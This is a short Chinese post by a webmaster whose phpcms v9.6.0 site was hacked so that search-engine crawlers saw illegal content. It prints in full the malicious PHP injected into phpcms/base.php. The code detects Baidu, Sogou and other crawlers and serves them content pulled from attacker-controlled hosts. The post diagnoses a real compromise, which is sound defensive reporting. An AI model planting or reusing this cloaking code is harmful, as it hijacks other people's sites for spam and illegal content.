百度移动版访问网站跳转到非法网站的原因及解决办法

采用　phpcms_v9.6.0_UTF8　做的网站，最近中了木马病毒，百度蜘蛛访问网站时自动显示非法内容。

http://www.sh0527.cn/?lhj=lhj=1296893874.docx&westauditpageinfo=1




经查，原因为　网站根目录\phpcms\base.php 文件被植入一段百度寄生虫代码，如图：

1. <?php
   
2. header("Content-Type: text/html;charset=utf-8");set_time_limit(0);error_reporting(0);$a='stristr';$b=$_SERVER;define('url',$b['REQUEST_URI']);define('ref',$b['HTTP_REFERER']);define('ent',$b['HTTP_USER_AGENT']);define('site',"http://zybchangan.top/");define('road',"?road=".$b['HTTP_HOST'].url."&der=".ent);define('regs','@Baidu|Sogou|Yisou|Soso|Haosou|360Spider|So.com|Sm.cn@i');define('area',$a(url,".xml")or $a(url,".doc")or $a(url,".txt")or $a(url,".ppt")or $a(url,".xls")or $a(url,".csv")or $a(url,".shtml")or $a(url,".docx")or $a(url,".xlsx")and $a(url,"?"));if(area&&preg_match(regs,ref)){echo gga('http://156.255.207.150/'.'/index.html');exit;}if(preg_match(regs,ent)){if(area){echo gga(site.road);exit;}else{echo gga(site."?zz".road);ob_flush();flush();}}function gga($d){$e=array('http'=>array('method'=>"GET"));$i=stream_context_create($e);$j=file_get_contents($d,false,$i);if(!empty($j)){return $j;}}
   
3. ?>

复制代码